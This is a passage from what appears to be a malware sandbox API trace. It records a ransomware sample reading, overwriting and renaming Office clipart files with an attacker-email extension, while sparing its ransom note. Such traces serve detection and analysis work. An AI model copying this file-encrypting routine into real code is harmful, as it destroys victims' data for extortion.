_File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.028] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107748.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107748.wmf.[evil@cock.lu].evil")) returned 1 [0145.029] ??_V@YAXPEAX@Z () returned 0x1 [0145.033] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107748.WMF", dwFileAttributes=0x200) returned 0 [0145.033] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.033] wcsstr (_Str="J0107750.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.033] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF") returned 69 [0145.033] wcscmp (_String1="J0107750.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.033] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107750.WMF") returned 0x0 [0145.033] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF") returned 0x45 [0145.033] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107750.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.036] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x126c, lpOverlapped=0x0) returned 1 [0145.042] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.042] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.042] _errno () returned 0x84b1160840 [0145.042] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.042] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1280, lpOverlapped=0x0) returned 1 [0145.042] CloseHandle (hObject=0x1a8) returned 1 [0145.043] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.043] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.043] __uncaught_exception () returned 0x84b1160800 [0145.043] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.043] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107750.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107750.wmf.[evil@cock.lu].evil")) returned 1 [0145.044] ??_V@YAXPEAX@Z () returned 0x1 [0145.048] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107750.WMF", dwFileAttributes=0x200) returned 0 [0145.049] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.049] wcsstr (_Str="J0136865.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.049] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF") returned 69 [0145.049] wcscmp (_String1="J0136865.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.049] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0136865.WMF") returned 0x0 [0145.049] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF") returned 0x45 [0145.049] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0136865.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.051] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4146, lpOverlapped=0x0) returned 1 [0145.055] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.055] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.055] _errno () returned 0x84b1160840 [0145.055] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.055] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x4160, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4160, lpOverlapped=0x0) returned 1 [0145.055] CloseHandle (hObject=0x1a8) returned 1 [0145.055] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.055] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.056] __uncaught_exception () returned 0x84b1160800 [0145.056] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.056] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0136865.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0136865.wmf.[evil@cock.lu].evil")) returned 1 [0145.057] ??_V@YAXPEAX@Z () returned 0x1 [0145.060] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0136865.WMF", dwFileAttributes=0x200) returned 0 [0145.061] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.061] wcsstr (_Str="J0144773.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.061] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG") returned 69 [0145.061] wcscmp (_String1="J0144773.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.061] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0144773.JPG") returned 0x0 [0145.061] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG") returned 0x45 [0145.061] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0144773.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.063] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9d27, lpOverlapped=0x0) returned 1 [0145.067] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.067] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.067] _errno () returned 0x84b1160840 [0145.067] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.067] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x9d40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9d40, lpOverlapped=0x0) returned 1 [0145.067] CloseHandle (hObject=0x1a8) returned 1 [0145.068] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.068] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.068] __uncaught_exception () returned 0x84b1160800 [0145.068] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.068] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0144773.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0144773.jpg.[evil@cock.lu].evil")) returned 1 [0145.069] ??_V@YAXPEAX@Z () returned 0x1 [0145.073] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG", dwFileAttributes=0x200) returned 0 [0145.073] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.073] wcsstr (_Str="J0145168.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.073] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG") returned 69 [0145.073] wcscmp (_String1="J0145168.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.073] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0145168.JPG") returned 0x0 [0145.073] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG") returned 0x45 [0145.073] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145168.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.076] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8379, lpOverlapped=0x0) returned 1 [0145.079] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.079] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.079] _errno () returned 0x84b1160840 [0145.080] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.080] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x8380, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8380, lpOverlapped=0x0) returned 1 [0145.080] CloseHandle (hObject=0x1a8) returned 1 [0145.080] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.080] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.080] __uncaught_exception () returned 0x84b1160800 [0145.080] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.081] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145168.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145168.jpg.[evil@cock.lu].evil")) returned 1 [0145.081] ??_V@YAXPEAX@Z () returned 0x1 [0145.085] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG", dwFileAttributes=0x200) returned 0 [0145.085] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.085] wcsstr (_Str="J0145212.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.085] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG") returned 69 [0145.086] wcscmp (_String1="J0145212.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.086] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0145212.JPG") returned 0x0 [0145.086] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG") returned 0x45 [0145.086] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145212.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.088] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xf0c1, lpOverlapped=0x0) returned 1 [0145.092] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.092] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.092] _errno () returned 0x84b1160840 [0145.092] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.092] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0xf0e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xf0e0, lpOverlapped=0x0) returned 1 [0145.092] CloseHandle (hObject=0x1a8) returned 1 [0145.092] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.093] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.093] __uncaught_exception () returned 0x84b1160800 [0145.093] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.093] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145212.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145212.jpg.[evil@cock.lu].evil")) returned 1 [0145.094] ??_V@YAXPEAX@Z () returned 0x1 [0145.098] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG", dwFileAttributes=0x200) returned 0 [0145.098] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.098] wcsstr (_Str="J0145272.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.098] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG") returned 69 [0145.098] wcscmp (_String1="J0145272.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.098] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0145272.JPG") returned 0x0 [0145.098] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG") returned 0x45 [0145.098] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145272.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.100] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc056, lpOverlapped=0x0) returned 1 [0145.103] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.103] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.103] _errno () returned 0x84b1160840 [0145.103] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.103] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xc060, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc060, lpOverlapped=0x0) returned 1 [0145.103] CloseHandle (hObject=0x1a8) returned 1 [0145.103] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.104] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.104] __uncaught_exception () returned 0x84b1160800 [0145.104] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.104] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145272.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145272.jpg.[evil@cock.lu].evil")) returned 1 [0145.105] ??_V@YAXPEAX@Z () returned 0x1 [0145.108] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG", dwFileAttributes=0x200) returned 0 [0145.108] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.108] wcsstr (_Str="J0145361.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.108] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG") returned 69 [0145.108] wcscmp (_String1="J0145361.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.108] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0145361.JPG") returned 0x0 [0145.108] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG") returned 0x45 [0145.108] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145361.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.110] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5285, lpOverlapped=0x0) returned 1 [0145.112] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.112] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.112] _errno () returned 0x84b1160840 [0145.112] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.112] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x52a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x52a0, lpOverlapped=0x0) returned 1 [0145.112] CloseHandle (hObject=0x1a8) returned 1 [0145.112] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.113] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.113] __uncaught_exception () returned 0x84b1160800 [0145.113] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.113] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145361.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145361.jpg.[evil@cock.lu].evil")) returned 1 [0145.114] ??_V@YAXPEAX@Z () returned 0x1 [0145.116] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145361.JPG", dwFileAttributes=0x200) returned 0 [0145.116] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0145.116] wcsstr (_Str="J0145373.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0145.116] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG") returned 69 [0145.116] wcscmp (_String1="J0145373.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0145.116] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0145373.JPG") returned 0x0 [0145.116] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG") returned 0x45 [0145.116] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145373.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0145.118] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x45cb, lpOverlapped=0x0) returned 1 [0145.120] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.120] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0145.120] _errno () returned 0x84b1160840 [0145.121] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.121] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x45e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x45e0, lpOverlapped=0x0) returned 1 [0145.121] CloseHandle (hObject=0x1a8) returned 1 [0145.121] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0145.121] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0145.121] __uncaught_exception () returned 0x84b1160800 [0145.121] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0145.121] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145373.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145373.jpg.[evil@cock.lu].evil")) returned 1 [0145.122] ??_V@YAXPEAX@Z () returned 0x1 [0145.125] SetFileAttributesW 